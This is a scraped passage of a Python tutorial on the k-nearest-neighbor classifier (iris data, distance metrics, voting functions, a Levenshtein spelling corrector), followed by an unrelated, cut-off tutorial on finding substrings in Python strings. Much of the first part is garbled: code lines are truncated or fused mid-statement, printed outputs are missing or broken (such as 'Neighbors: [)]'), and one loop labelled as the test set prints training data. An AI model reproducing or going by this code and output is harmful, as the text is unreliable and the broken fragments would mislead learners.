d(o_{i_{j+1}}, o)$ is true for all $1 \leq j \leq {n-1}$ The set of k-nearest neighbors $N_k$ consists of the first $k$ elements of this ordering, i.e. $N_k = \{ (o_{i_1}, c_{o_{i_1}}), (o_{i_2}, c_{o_{i_2}}), \cdots (o_{i_k}, c_{o_{i_k}}) \}$ The most common class in this set of nearest neighbors $N_k$ will be assigned to the instance $o$. If there is no unique most common class, we take an arbitrary one of these. There is no general way to define an optimal value for 'k'. This value depends on the data. As a general rule we can say that increasing 'k' reduces the noise but on the other hand makes the boundaries less distinct. The algorithm for the k-nearest neighbor classifier is among the simplest of all machine learning algorithms. k-NN is a type of instance-based learning, or lazy learning. In machine learning, lazy learning is understood to be a learning method in which generalization of the training data is delayed until a query is made to the system. On the other hand, we have eager learning, where the system usually generalizes the training data before receiving queries. In other words: The function is only approximated locally and all the computations are performed, when the actual classification is being performed. The following picture shows in a simple way how the nearest neighbor classifier works. The puzzle piece is unknown. To find out which animal it might be we have to find the neighbors. If k=1, the only neighbor is a cat and we assume in this case that the puzzle piece should be a cat as well. If k=4, the nearest neighbors contain one chicken and three cats. In this case again, it will be save to assume that our object in question should be a cat. k-nearest-neighbor from Scratch Preparing the Dataset Before we actually start with writing a nearest neighbor classifier, we need to think about the data, i.e. the learnset and the test() data = iris.data labels = iris.target for i in [0, 79, 99, 121]: print(f"index: {i:3}, features: {data[i]}, label: {labels[i]}") OUTPUT: index: 0, features: [5.1 3.5 1.4 0.2], label: 0 index: 79, features: [5.7 2.6 3.5 1. ], label: 1 index: 99, features: [5.7 2.8 4.1 1.3], label: 1 index: 121, features: [5.6 2.8 4.9 2. ], label: 2 We create a learnset from the sets above. We use permutation from np.random to split the data randomly. # seeding is only necessary for the website #so that the values are always equal: np.random.seed(42) indices = np.random.permutation(len(data)) n_training_samples = 12 learn_data = data[indices[:-n_training_samples]] learn_labels = labels[indices[:-n_training_samples]] test_data = data[indices[-n_training_samples:]] test_labels = labels[indices[-n_training_samples:]] print("The first samples of our learn set:") print(f"{'index':7s}{'data':20s}{'label':3s}") for i in range(5): print(f"{i:4d} {learn_data[i]} {learn_labels[i]:3}") print("The first samples of our test set:") print(f"{'index':7s}{'data':20s}{'label':3s}") for i in range(5): print(f"{i:4d} {learn_data[i]} {learn_labels[i]:3}") OUTPUT: The first samples of our learn first samples of our test: #%matplotlib widget import matplotlib.pyplot as plt from mpl_toolkits.mplot3d import Axes3D colours = ("r", "b") X = [] for iclass in range(3): X.append([[], [], []]) for i in range(len(learn_data)): if learn_labels[i] == iclass: X[iclass][0].append(learn_data[i][0]) X[iclass][1].append(learn_data[i][1]) X[iclass][2].append(sum(learn_data[i][2:])) colours = ("r", "g", "y") fig = plt.figure() ax = fig.add_subplot(111, projection='3d') for iclass in range(3): ax.scatter(X[iclass][0], X[iclass][1], X[iclass][2], c=colours[iclass]) plt.show() /> Distance metrics We have already mentioned in detail, we calculate the distances between the points of the sample and the object to be classified. To calculate these distances we need a distance function. In n-dimensional vector rooms, one usually uses one of the following three distance metrics: Euclidean Distance The Euclidean distance between two points xand yin either the plane or 3-dimensional space measures the length of a line segment connecting these two points. It can be calculated from the Cartesian coordinates of the points using the Pythagorean theorem, therefore it is also occasionally being called the Pythagorean distance. The general formula is $$d(x, y) = \sqrt{\sum_{i=1}^{n} (x_i -y_i)^2}$$ Manhattan Distance It is defined as the sum of the absolute values of the differences between the coordinates of x and y: $$d(x, y) = \sum_{i=1}^{n} |x_i -y_i|$$ Minkowski Distance The Minkowski distance generalizes the Euclidean and the Manhatten distance in one distance metric. If we set the parameter pin the following formula to 1 we get the manhattan distance an using the value 2 gives us the euclidean distance: $$d(x, y) = { \left(\sum_{i=1}^{n} |x_i -y_i|^p \right)}^{\frac{1}{p}}$$ The following diagram visualises the Euclidean and the Manhattan distance: The blue line illustrates the Eucliden distance between the green and red dot. Otherwise you can also move over the orange, green or yellow line from the green point to the red point. The lines correspond to the manhatten distance. The length is equal. Determining the Neighbors To determine the similarity between two instances, we will use the Euclidean distance. We can calculate the Euclidean distance with the function norm of the module np.linalg: def distance(instance1, instance2): """ Calculates the Eucledian distance between two instances""" return np.linalg.norm(np.subtract(instance1, instance2)) print(distance([3, 5], [1, 1])) print(distance(learn_data[3], learn_data[44])) OUTPUT: 4.47213595499958 3.4190641994557516 The function get_neighbors returns a list with k neighbors, which are closest to the instance test_instance: def get_neighbors(training_set, labels, test_instance, k, distance): """ get_neighors calculates a list of the k nearest neighbors of an instance 'test_instance'. The function returns a list of k 3-tuples. Each 3-tuples consists_data, learn_labels, test_data[i], 3, distance=distance) print("Index: ",i,'\n', "Testset Data: ",test_data[i],'\n', "Testset Label: ",test_labels[i],'\n', "Neighbors: ",neighbors,'\n') OUTPUT: Index: 0 Testset Data: [5.7 2.8 4.1 1.3] Testset Label: 1 Neighbors: [)] Index: 1 Testset Data: [6.5 3. 5.5 1.8] Testset Label: 2 Neighbors: [)] Index: 2 Testset Data: [6.3 2.3 4.4 1.3] Testset Label: 1 Neighbors: [)] Index: 3 Testset Data: [6.4 2.9 4.3 1.3] Testset Label: 1 Neighbors: [)] Index: 4 Testset Data: [5.6 2.8 4.9 2. ] Testset Label: 2 Neighbors: [)] Voting to get a Single Result We will write a vote function now. This functions uses the class Counter from collections to count the quantity of the classes inside of an instance list. This instance list will be the neighbors of course. The function vote returns the most common class: from collections import Counter def vote(neighbors): class_counter = Counter() for neighbor in neighbors: class_counter[neighbor[2]] += 1 return class_counter.most_common(1)[0][0] We will test 'vote' on our training samples: for i in range(n_training_samples): neighbors = get_neighbors(learn_data, learn_labels, test_data[i], 3, distance=distance) print("index: ", i, ", result of vote: ", vote(neighbors), ", label: ", test_labels[i], ", data: ", test_data[i]) OUTPUT:_data, learn_labels, test_data[i], 5, distance=distance) print("index: ", i, ", vote_prob: ", vote_prob(neighbors), ", label: ", test_labels[i], ", data: ", test_data[i]) OUTPUT:_harmonic_distance)]) Another Example for Nearest Neighbor Classification We want to test the previous functions with another very simple dataset: train_set = [(1, 2, 2), (-3, -2, 0), (1, 1, 3), (-3, -3, -1), (-3, -2, -0.5), (0, 0.3, 0.8), (-0.5, 0.6, 0.7), (0, 0, 0) ] labels = ['apple', 'banana', 'apple', 'banana', 'apple', "orange", 'orange', 'orange'] k = 2 for test_instance in [(0, 0, 0), (2, 2, 2), (-3, -1, 0), (0, 1, 0.9), (1, 1.5, 1.8), (0.9, 0.8, 1.6)]: neighbors = get_neighbors(train_set, labels, test_instance, k, distance=distance) print("vote distance weights: ", vote_distance_weights(neighbors)) OUTPUT:)) OUTPUT:)]) You may wonder why the city of Freiburg has not been recognized. The reaons is that our data file with the city names contains only "Freiburg im Breisgau". If you add "Freiburg" as an entry, it will be recognized as well. Marvin and James introduce us to our next example: Can you help Marvin and James? You will need an English dictionary and a k-nearest Neighbor classifier to solve this problem. If you work under Linux (especially Ubuntu), you can find a file with a British-English dictionary under /usr/share/dict/british-english. Windows users and others can download the file as /data1/british-english.txt", "thoes", "innerstand", "blagrufoo", "liberdi"]: neighbors = get_neighbors(words, words, word, 3, distance=levenshtein) print("vote_distance_weights: ", vote_distance_weights(neighbors, all_results=False)) print("vote_prob: ", vote_prob(neighbors)) print("vote_distance_weights: ", vote_distance_weights(neighbors)) OUTPUT: vote_distance_weights: ('helpful', 0.5555555555555556) vote_prob: ('helpful', 0.3333333333333333) vote_distance_weights: ('helpful', [('helpful', 0.5555555555555556), ('doleful', 0.22222222222222227), ('hopeful', 0.22222222222222227)]) vote_distance_weights: ('kindness', 0.5) vote_prob: ('kindness', 0.3333333333333333) vote_distance_weights: ('kindness', [('kindness', 0.5), ('fondness', 0.25), ('kudos', 0.25)]) vote_distance_weights: ('helpless', 0.3333333333333333) vote_prob: ('helpless', 0.3333333333333333) vote_distance_weights: ('helpless', [('helpless', 0.3333333333333333), ("hippo's", 0.3333333333333333), ('hippos', 0.3333333333333333)]) vote_distance_weights: ('hoes', 0.3333333333333333) vote_prob: ('hoes', 0.3333333333333333) vote_distance_weights: ('hoes', [('hoes', 0.3333333333333333), ('shoes', 0.3333333333333333), ('thees', 0.3333333333333333)]) vote_distance_weights: ('understand', 0.5) vote_prob: ('understand', 0.3333333333333333) vote_distance_weights: ('understand', [('understand', 0.5), ('interstate', 0.25), ('understands', 0.25)]) vote_distance_weights: ('barefoot', 0.4333333333333333) vote_prob: ('barefoot', 0.3333333333333333) vote_distance_weights: ('barefoot', [('barefoot', 0.4333333333333333), ('Baguio', 0.2833333333333333), ('Blackfoot', 0.2833333333333333)]) vote_distance_weights: ('liberal', 0.4) vote_prob: ('liberal', 0.3333333333333333) vote_distance_weights: ('liberal', [('liberal', 0.4), ('liberty', 0.4), ('Hibernia', 0.2)])
https://python-course.eu/machine-learning/k-nearest-neighbor-classifier-in-python.php
CC-MAIN-2022-05
refinedweb
1,961
57.98
#include <iostream> using namespace std; //. Use the following screen shots as a guide. int main() { double scores[75]; int counter = -1; do { counter++; cout << "Please enter a score (enter -1 to stop): "; cin >> scores[counter]; } while (scores[counter] >= 0); for (int y = 0; y > counter; y++) { double x, lowest = 100, highest = 0; if (lowest > scores) lowest = x; if (highest < x) highest = x; cout << "Highest is " << highest << endl; cout << "Lowest is " << lowest << endl; } } I am having trouble finding the average of the numbers entered. When I enter -1 the program should output the average first, then the highest number, and lastly the lowest number. I am not sure how to work with this type of program I am a noob and stuck. I have been working on this program for a long long time now and any little advice or help would be appreciated.
http://www.dreamincode.net/forums/topic/142757-finding-the-average-highest-and-lowest-number-of-an-array/
CC-MAIN-2017-34
refinedweb
143
73.21
OpenCV is one of the most common libraries that you need in any computer vision or image processing task. Before applying different filters for image processing or to perform any image-related task, you must know how to read an image, display an image, or write an image. OpenCV comes with built-in functions to perform these basic operations. Let’s see how you can use these functions in your task. Before performing any operation, make sure you have OpenCV, Numpy, and Matplotlib (optional) in your system. OpenCV uses Numpy in the backend and Matplotlib is required for displaying images. You can follow our OpenCV Intro Guide to see how you can install it. This is the original image that is going to be used here: Photo by Nick Fewings on Unsplash. Reading an Image OpenCV has a built-in function that will read/load/open an image which is cv2.imread(). Let’s see the syntax: import cv2 cv2.imread(Pathname, Flag) It consists of two arguments: - Pathname: It contains the pathname of the image to be read. Make sure your image should be in the same directory or the full pathname of the image should be specified, otherwise you will get an empty matrix. - Flag: It is an optional argument. It sets the format of the image in a way you want to be read. There are three types of flags: cv2.IMREAD_COLOR or 1: This will read the image in a colored mode by removing any transparency from the image. OpenCV loads the color image in a BGR 8-bit format. This flag is used by default. cv2.IMREAD_GRAYSCALE or 0: This will read the image in a grayscale mode. cv2.IMREAD_UNCHANGED or -1: This will read the image as it is including the alpha channel if it is present. Let’s see how you can read an image by using three different flags: img_colored = cv2.imread('dog.jpg', 1) img_grayscale = cv2.imread('dog.jpg', 0) img_unchanged = cv2.imread('dog.jpg', -1) The loaded image object will be a numpy ndarray. You can get its dimensions by using .shape. Be careful since it returns the height first, then the width, and for non-grayscale images it also returns the number of color channels: img_colored = cv2.imread('dog.jpg', 1) height, width, num_channels = img.shape print(type(img_colored)) print(height, width, num_channels) # <class 'numpy.ndarray'> # 404 606 3 img_grayscale = cv2.imread('dog.jpg', 0) # only height and width for grayscale height, width = img.shape Displaying an Image OpenCV has a built-in function that will display an image in a window which is cv2.imshow(). Let’s see the syntax: cv2.imshow(WindowName, Image) It consists of two arguments: - WindowName: It specifies the name of the window which contains the image. This will help you to display multiple images at a time, you can specify different window names for every image. - Image: It is the image that will be displayed. There are other functions that are used along with this function. - cv2.waitKey(): It will display the window on the screen for the time period which is in milliseconds. The value should be a positive integer. If the value is 0, It will hold the window indefinitely until you press a key. - cv2.destroyAllWindows(): It will destroy all the open windows from the screen and from the memory which was created. - cv2.destroyWindow(): It will destroy the specific window. The argument will be a window name that you want to be destroyed. Let's see how it looks: img_colored = cv2.imread('dog.jpg', 1) cv2.imshow('Grayscale Image', img_colored) img_colored = cv2.imread('dog.jpg', 1) img_grayscale = cv2.imread('dog.jpg', 0) cv2.imshow('Grayscale Image', img_grayscale) Writing an Image OpenCV has a built-in function that will write/save an image to the given path which is cv2.imwrite(). It will save your image in the working directory. Let’s see the syntax: cv2.imshow(FileName, Image) It consists of two arguments: - FileName: It contains the name of the file which should be in the .jpg, .png, etc format. - Image: It is the name of the image that will be saved. To sum it up, you will see an example that will load an image in grayscale, displays it, and then saves it. import cv2 # Reading an image img_gray = cv2.imread('dog.jpg', 0) # Display an image in a window cv2.imshow('Grayscale Image', img_gray) # Wait for a keystroke cv2.waitKey(0) # Destroy all the windows cv2.destroyAllWindows() # Write an image cv2.imwrite('dog_grayscale.jpg', img_gray) Drawing and working with images You can use different functions to draw shapes and text in an image: cv2.line cv2.rectangle cv2.circle cv2.ellipse cv2.polylines cv2.putText import numpy as np import cv2 # Load an color image in grayscale img = cv2.imread('dog.jpg', 1) height, width, channels = img.shape # Draw a diagonal blue line with thickness of 5 px img = cv2.line(img, (0, 0), (width-1,height-1), (255, 0, 0), 5) # Rectangle: pt1, pt2, color, thickness x1 = width // 2 img = cv2.rectangle(img, (x1, 0), (x1 + 150, 150), (0, 255, 0), 3) # Circle: center, radius, color, thickness, -1=fill img = cv2.circle(img, (447, 63), 63, (0, 0, 255), -1) # Ellipse img = cv2.ellipse(img, (width // 2, height // 2), (100, 50), 0, 0, 180, (0, 0, 255), -1) # Polygon pts = np.array([[10, 5], [20, 30], [70, 20], [50, 10]], np.int32) pts = pts.reshape((-1, 1, 2)) img = cv2.polylines(img,[pts], True, (0, 255, 255)) # Text font = cv2.FONT_ITALIC cv2.putText(img, 'OpenCV', (10, 500), font, 4, (255, 255, 255), 3, cv2.LINE_AA) cv2.imshow('image', img) This is how it looks like: End Notes This article will help you to start your OpenCV journey. You learned how to read an image, how to display it, how to save it in your local directory, and how to draw shapes in an image.
https://www.python-engineer.com/posts/opencv-images/
CC-MAIN-2022-21
refinedweb
988
76.42
niks1020 25-07-2019 I have created one custom metadata (say: myCustomMetadataSchema) in which I mapped one of my text field to custom property as : ./jcr:content/metadata/myCustomField It can be seen that this field myCustomField is not having any namepsace like jcr, dam, iptc, at cetera. Now when I export the metadata of assets (as shown below) from a folder on which myCustomMetadataSchema is applied I get all the data as expected, even those fields which are not having any namespace with them. But when I upload the excel file to update the above mentioned property ./jcr:content/metadata/myCustomField The importer fails to update this field in asset. The only reason I think possible is that because this asset is not having any namespace mapped to it. If I change this metadata schema field to have some namespace let say: ./jcr:content/metadata/dam:myCustomField Then the importer is able to make change to the filed on asset. Can somebody please let me know : Please let me know if something can be done regarding this other than applying namespace to the field. Thanks, Nikhil Vish_dhaliwal Employee 26-07-2019 Hello, Yes, it is a bug with the internal reference number is CQ-4269445 which is backported to 6.4 via NPR-29425 released in 6.4.5.0. Please test the Sp5 and see how it goes. Regards, Vishu
https://experienceleaguecommunities.adobe.com/t5/adobe-experience-manager/aem-6-4-metadata-import-not-working-for-fields-without-namespace/qaq-p/317889
CC-MAIN-2020-50
refinedweb
232
61.97
Logging system¶ Overview¶ The Astropy logging system is designed to give users flexibility in deciding which log messages to show, to capture them, and to send them to a file. All messages printed by Astropy routines should use the built-in logging facility (normal print() calls should only be done by routines that are explicitly requested to print output). Messages can have one of several levels: - DEBUG: Detailed information, typically of interest only when diagnosing problems. - INFO: An message conveying information about the current task, and confirming that things are working as expected - WARNING: An indication that something unexpected happened, and that user action may be required. - ERROR: indicates a more serious issue, including exceptions By default, only WARNING and ERROR messages are displayed, and are sent to a log file located at ~/.astropy/astropy.log (if the file is writeable). Configuring the logging system¶ First, import the logger: from astropy import log The threshold level (defined above) for messages can be set with e.g.: log.setLevel('INFO') Color (enabled by default) can be disabled with: log.disable_color() and enabled with: log.enable_color() Warnings from warnings.warn can be logged with: log.enable_warnings_logging() which can be disabled with: log.disable_warnings_logging() and exceptions can be included in the log with: log.enable_exception_logging() which can be disabled with: log.disable_exception_logging() It is also possible to set these settings from the Astropy configuration file, which also allows an overall log file to be specified. See Using the configuration file for more information. Context managers¶ In some cases, you may want to capture the log messages, for example to check whether a specific message was output, or to log the messages from a specific section of code to a file. Both of these are possible using context managers. To add the log messages to a list, first import the logger if you have not already done so: from astropy import log then enclose the code in which you want to log the messages to a list in a with statement: with log.log_to_list() as log_list: # your code here In the above example, once the block of code has executed, log_list will be a Python list containing all the Astropy logging messages that were raised. Note that messages continue to be output as normal. Similarly, you can output the log messages of a specific section of code to a file using: with log.log_to_file('myfile.log'): # your code here which will add all the messages to myfile.log (this is in addition to the overall log file mentioned in Using the configuration file). While these context managers will include all the messages emitted by the logger (using the global level set by log.setLevel), it is possible to filter a subset of these using filter_level=, and specifying one of 'DEBUG', 'INFO', 'WARN', 'ERROR'. Note that if filter_level is a lower level than that set via setLevel, only messages with the level set by setLevel or higher will be included (i.e. filter_level is only filtering a subset of the messages normally emitted by the logger). Similarly, it is possible to filter a subset of the messages by origin by specifying filter_origin= followed by a string. If the origin of a message starts with that string, the message will be included in the context manager. For example, filter_origin='astropy.wcs' will include only messages emitted in the astropy.wcs sub-package. Using the configuration file¶ Options for the logger can be set in the [config.logging_helper] section of the Astropy configuration file: [config.logging_helper] # Threshold for the logging messages. Logging messages that are less severe # than this level will be ignored. The levels are 'DEBUG', 'INFO', 'WARNING', # 'ERROR' log_level = 'INFO' # Whether to use color for the level names use_color = True # Whether to log warnings.warn calls log_warnings = False # Whether to log exceptions before raising them log_exceptions = False # Whether to always log messages to a log file log_to_file = True # The file to log messages to log_file_path = '~/.astropy/astropy.log' # Threshold for logging messages to log_file_path log_file_level = 'INFO' # Format for log file entries log_file_format = '%(asctime)s, %(origin)s, %(levelname)s, %(message)s'
http://docs.astropy.org/en/stable/logging.html
CC-MAIN-2019-13
refinedweb
685
54.52
Our code doesn’t do anything yet because we haven't included our new page in the app, so please go back to index.js and modify it to this: src/index.js import React from 'react'; import ReactDOM from 'react-dom'; import Detail from './pages/Detail'; ReactDOM.render( <Detail />, document.getElementById('app') ); Save both index.js and Detail.js and, all being well, you should be able to return to your web browser and see "This is React rendering HTML!" right there on the screen. Don't see anything? You may have made a typo, and should look in your browser's console for more information. Sometimes the error messages can be a bit obscure, so you might need to investigate carefully. For example, the error message "Super expression must either be null or a function, not undefined" probably means you created the Detail component using class Detail extends React.component rather than class Detail extends React.Component – note the difference of a capital C in Component is all it takes to break. As another example, an error message similar to "ERROR in ./src/index.js: Unexpected token (7:2)" actually means you probably forgot to modify your package.json file way back in chapter one – the new lines that load Babel presets for es2015 and react are required, so please go back to chapter one and ensure your package.json file is correct. Anyway, before I explain what the new code does, try going back to Detail.js and modify its render method to say "This is JSX being converted to HTML!" If you do that, then press save again, you'll see some magic happen: your web browser will automatically update to show the new message. You don't need to run any commands or indeed take any other action than saving your code – Webpack Dev Server automatically detects the change and reloads your work. Hopefully you can now see why it was so important to get the Webpack configuration right at the start of this tutorial, because using this development set up (known as "hot loading") makes coding substantially faster. Note: if you don't see any changes, just hit Refresh in your browser. Now, let me explain what the new code in index.js does… When our app gets built, that <Detail /> line automatically gets converted into the Detail component we created inside Detail.js, which in turn has its render() method called so it draws to the screen. Now, before we continue you probably have some questions. Let me try to answer some: <Detail />means? We don't give the component a name inside Detail.js, so instead the name comes from the way we import it: if you use import Bob from './pages/Detail';then you could write <Bob />and it would work just fine. (But please don't do that if you value your sanity!) To recap, so far you've learned: Not bad, but that's just the beginning…!
http://www.hackingwithreact.com/read/1/4/importing-react-components-using-es6
CC-MAIN-2017-22
refinedweb
498
66.13
Chapter 347. XPath Language Available as of Camel version 1.1. from("queue:foo"). filter().xpath("//foo")). to("queue:bar") from("queue:foo"). choice().xpath("//foo")).to("queue:bar"). otherwise().to("queue:others"); 347.1. XPath Language options The XPath language supports 9 options which are listed below. 347.2. Namespaces You can easily use namespaces with XPath expressions using the Namespaces helper class. 347.3. Variables Variables in XPath is defined in different namespaces. The default namespace is. Camel will resolve variables according to either: - namespace given - no namespace given 347.3.1. Namespace. 347.3.2. 347.4. Functions Camel adds the following XPath functions that can be used to access the exchange: function:properties and function:simple is not supported when the return type is a NodeSet, such as when using with a Splitter EIP. Here’s an example showing some of these functions in use. And the new functions introduced in Camel 2.5: 347 347.6. Setting. 347.7. Using XPath on Headers Available as of") 347.8. Examples: 347.9. XPath injection public class Foo { @MessageDriven(uri = "activemq:my.queue") public void doSomething(@MyXPath("/ns1:foo/ns2:bar/text()") String correlationID, @Body String body) { // process the inbound message here } } 347.10.>"); 347.11. Using Saxon with XPathBuilder Available as of Camel 2.3 347.12. 347.13. Enabling Saxon from Spring DSL Available as of> 347.14. Namespace auditing to aid debugging Available as of 347.15.=[,]} 347.16. Loading script from external resource").xpath("resource:classpath:myxpath.txt", String.class) 347.17. Dependencies The XPath language is part of camel-core.
https://access.redhat.com/documentation/en-us/red_hat_fuse/7.3/html/apache_camel_component_reference/xpath-language
CC-MAIN-2021-25
refinedweb
268
59.6
Nagare Tutorial, learning concepts The goals of Nagare are to develop a web application similar to any standard python application. There are three steps to reach this goal: - Do everything in python (no sql, no templating language, avoid javascript as much as possible) - Hide request/response mechanics, there is no manual handling of session - Use aggregation as the shortest way to transform any python object into a Nagare component Part2, modify default application With nagare-admin create-app a complete setuptools compatible package is created. Some Nagare specific files are also created: - conf/tutorial.cfg: application configuration file - data: folder where read/write datas are expected (sqlite database, csv files, etc.) - static: folder where html static files are stored (css, images and javascript) - tutorial/models.py: file where database models are defined using Elixir/SQLAlchemy ORM - tutorial/app.py: code of your application Let's start with a pure python class. Replace the whole content of tutorial/app.py with: class Counter(object): def __init__(self): self.val = 0 def increase(self): self.val += 1 def decrease(self): self.val -= 1 - Now, add an HTML view for the Counter class: from nagare import presentation ... @presentation.render_for(Counter) def render(counter, h, *args): return "Hello" For Nagare, a view is just a function that takes a renderer (h) as a parameter and returns a DOM tree. In this example, we return a simple DOM tree with only one text node. To bind the view with the Counter class, we import Nagare presentation service and use render_for decorator. - Define the Nagare application: For Nagare, an application is just an object factory (i.e. a callable that returns an object graph), and obviously a class is, so we just have to add the following to our app.py file: ... # define app app = Counter - You can now view your new web application in your browser (go to ''). If you look a the new webpage source, you see that Nagare has wrapped the text node into a valid html structure. By default, the DOM tree is serialized as HTML4. This can be changed in the application configuration file, to use XHTML if the browser accepts it. - A more complex DOM tree: Replace the Counter view with the following one: ... @presentation.render_for(Counter) def render(counter, h, *args): return h.div("Value: ", counter.val) ... As you can see HTML renderer h can be used as a factory for HTML tags. h can also be seen as a namespace, it only accepts a list of defined tag (all of HTML tags but not one more). As we build a DOM tree, we are protected against code injection. For example, if counter.value contains something like: "<script>alert('Hello World');</script>" This string will be escaped and no javascript will ever be executed. To do something like that you must parse html string into a DOM tree and append the resulting DOM tree into the the renderer. Go to part 1 of this tutorial | Go to part 3 of this tutorial
http://www.nagare.org/trac/wiki/NagareTutorial2?version=3
CC-MAIN-2018-43
refinedweb
503
55.64
Machine Learning in Java has never been easier! Java is by far one of the most popular programming languages. It’s on the top of the TIOBE index and thousands of the most robust, secure, and scalable backends have been built in Java. In addition, there are many wonderful libraries available that can help accelerate your project enormously. For example, most of BigML’s backend is developed in Clojure which runs on top of the Java Virtual Machine. And don’t forget the ever-growing Android market, with 850K new devices activated each day! There are number of machine learning Java libraries available to help build smart data-driven applications. Weka is one of the more popular options. In fact, some of BigML’s team members were Weka users as far back as the late 90s. We even used it as part of the first BigML backend prototype in early 2011. Apache Mahout is another great Java library if you want to deal with bigger amounts of data. However in both cases you cannot avoid “the fun of running servers, installing packages, writing MapReduce jobs, and generally behaving like IT ops folks“. In addition you need to be concerned with selecting and parametrizing the best algorithm to learn from your data as well as finding a way to activate and integrate the model that you generate into your application. Thus we are thrilled to announce the availability of the first Open Source Java library that easily connects any Java application with the BigML REST API. It has been developed by Javi Garcia, an old friend of ours. A few of the BigML team members have been lucky enough to work with Javi in two other companies in the past. With this new library, in just a few lines of code you can create a predictive model and generate predictions for any application domain. From finding the best price for a new product to forecasting sales, creating recommendations, diagnosing malfunctions, or detecting anomalies. The library is shipped with Maven as project manager and has a test suite developed using Cucumber. If you clone it from Github and add your BigML credentials to src/main/resources/binding.properties, you can run the tests: mvn test If you’re a Maven aficionado, you can add BigML to your project by following these two steps: - Install the library to your local maven repo by executing “mvn install” in the bigml-java directory. - Add the dependency to your pom.xml: <dependency> <groupId>org.bigml</groupId> <artifactId>java-binding</artifactId> <version>1.0-SNAPSHOT</version> </dependency> <dependency> <groupId>com.googlecode.json-simple</groupId> <artifactId>json-simple</artifactId> <version>1.1.1</version> </dependency> The json-simple dependency is used to wrap the responses of the BigML client. Below you can see the simplest Java class integrating the BigML binding: import org.bigml.binding.AuthenticationException; import org.bigml.binding.BigMLClient; import org.json.simple.JSONObject; public class BigmlClient { /** * A simple Java Class to integrate the BigML API * * @param args */ public static void main(String[] args) { BigMLClient bigml = null; try { // BigML API's credentials might be passed as parameters bigml = BigMLClient.getInstance(); } catch (AuthenticationException e) { e.printStackTrace(); return; } // Create a datasource by upload a file JSONObject source = bigml.createSource("data/iris.csv", "My First Source", null); System.out.println(source.toJSONString()); // Wait until source is ready while (!bigml.sourceIsReady(source)) { source = bigml.getSource(source); System.out.println("Waiting for source to be ready"); } System.out.println(source.toJSONString()); } } That’s all you need to start using BigML in your Java application If you are developer and want to start to use our API right away, just drop a line to info@bigml.com and we’ll send you an invite. Happy Java Hacking! Trackbacks & Pingbacks - Machine Learning on Rails with Ruby! « The Official Blog of BigML.com - Machine Learning Throwdown, Part 2 – Data Preparation « The Official Blog of BigML.com - Democratizing Machine Learning With C# | The Official Blog of BigML.com - Alternative Keys: Fine-grained, REST API Access to Your Machine Learning Resources | The Official Blog of BigML.com Nice information. I enjoy it very much. Thanks. You are invited Java Class tutorials. Very cool. I’m a curator for DZone.com. Would you be interested in posting this or an original post about this topic in Javalobby? Shoot me an email if it sounds like a good idea to you. Hi mi0tch919, feel free to post this on DZone, or give me an address I can use to get in contact you. Thanks!
https://blog.bigml.com/2012/06/07/machine-learning-in-java-has-never-been-easier/
CC-MAIN-2017-22
refinedweb
756
58.28
Hi I am having some problems porting a C program (traffic simulator) to C++ using the g++ compiler. For a car structure defined in C header file : typedef struct /* type definition for cars */ { int id; /*car identifier*/ int color; double distance; /* distance travelled so far */ double speed; /* speed of the car */ int x,y; /* graphics: x & y coords of the car */ void * nextlane; /* the lane we will enter in the next junc */ void * behind; /* pointer to car behind in the lane */ int part; }car_t; which I included in the C++ program as follows: extern "C" { #include "traffic.h" ... } I need to do a casting in my C++ main program, as follows, before it compiles without errors: c = (car_t *) fc->behind; but when I am running the simulation it is giving me a segmentation fault where I am using car c for example : c->distance It does not give that error when the program first goes through the simulation loop i.e. only when it goes to the next car after the casting step. I think there is a problem with the way I am casting or I have missed some steps somewhere. Any help will be appreciated as this has already took too much of my time. Thanks, Josh
http://forums.devshed.com/programming/83214-casting-segmentation-fault-last-post.html
CC-MAIN-2014-35
refinedweb
209
53.89
Strings are a collection of characters enclosed in single or double quotes in Python. You may need to verify if a string contains a substring during various string manipulation operations. Further, you may check if a string contains a substring using the IN keyword and the IF statement. We regularly meet a circumstance in Python web development where we must identify whether a specific member from a given list is a sub-string or not. It is another common occurrence in the Machine Learning industry. We will have a look at some choices for doing so. We’ll also verify if a python string has a substring in this Python article. These include various Python methods for determining whether a text contains a substring. Further, we examine the different strategies and discuss their applications in depth. Each has its own set of uses, benefits, and drawbacks, some of which may be found in Python’s String containing a substring. Ways to check for a substring in a python string: - Using the in operator - Using the index() approach - Using the find() methods - Using the String Methods - Using the count() method - Using Regular expressions Why would you want to see if a Python string has a substring? We check if a python string has a substring for various reasons, but conditional statements are the most typical application. In this situation, a specific code is executed. Another popular application is to determine the index of a substring within a string. The contains function is most likely something you’ve seen in other programming languages. However, the contains method is also supported by Python. Additionally, it includes a couple of ways to check if a Python string consists of a faster and more understandable substring. We’ll take a look at these in more detail later. Using the ‘in’ operator The in operator is the most straightforward pythonic technique to determine whether a Python string includes a substring. The membership operators in and not intakes two arguments and determine whether one is a member of the other. They give you a boolean answer. Only the in method can determine whether a python string contains a substring. If you need to know the substring index, the following solution can help. It is a faster alternative to the has method, and it may also be used to see if an item in a list exists. in has the following syntax: substring in string The syntax for ‘not in’ is the same as it is for in. To see if a Python string has a substring, we will use the following code: if "Code" in "Codeunderscored is the best coding site": print("Exists") else: print("Does not exist") Because the in operator is case sensitive, the above code would have returned false if the substring was “code,” therefore using it with the.lower() technique is a good idea. This approach lowers the case of the string. It would not affect the original string because strings are immutable. if "code" in "Codeunderscored is the best coding site".lower(): print("Exists") else: print("Does not exist") String methods in action Python has a few string methods for determining whether or not a string contains a substring. We’ll look at the search() and index () methods, among the other ways. These methods locate and return the substring’s index. They do, however, have a few drawbacks, which we shall go over in detail. Making use of the index () The string returns the starting index of the substring passed as a parameter.index() function. It returns a ValueError if the substring does not exist is a huge disadvantage. A Try Except can be used to fix this problem. index() has the following syntax: string.index(value, start, stop) The value is the substring, and the string refers to the python string. There are two possible options in the syntax: start and stop. These accept index values and aid in searching for a substring within a given index range. Index() is used in the following code: string = "Codeunderscored is the best coding site." sti="Code" try: "Codeunderscored is the best coding site".index("Code") except ValueError: print("Does not exist") else: print(string.index(sti)) To avoid arising issues, make sure you use the.lower() function instead of index() which is case sensitive. try: "Codeunderscored is the best coding site".lower().index("Code") except ValueError: print("Does not exist") else: print(sting.index(sti)) Using find() Another method that we might use to check our query is find(). find() returns the starting index of the substring in the same way as index () does. Find(), on the other hand, returns -1 if the substring does not exist. The leftmost character’s negative index is -1. find() has the following syntax: string.find(value, start, end) parameter definition - substring: a substring in a string that needs to be found. - start (optional): The starting point for searching for the substring within the string. - end(optional): It is the position in the string where the suffix has to be found. If start and end indexes are not specified, 0 is used as the start index, and length-1 is used as the end index by default. find() has the same syntax and parameters as 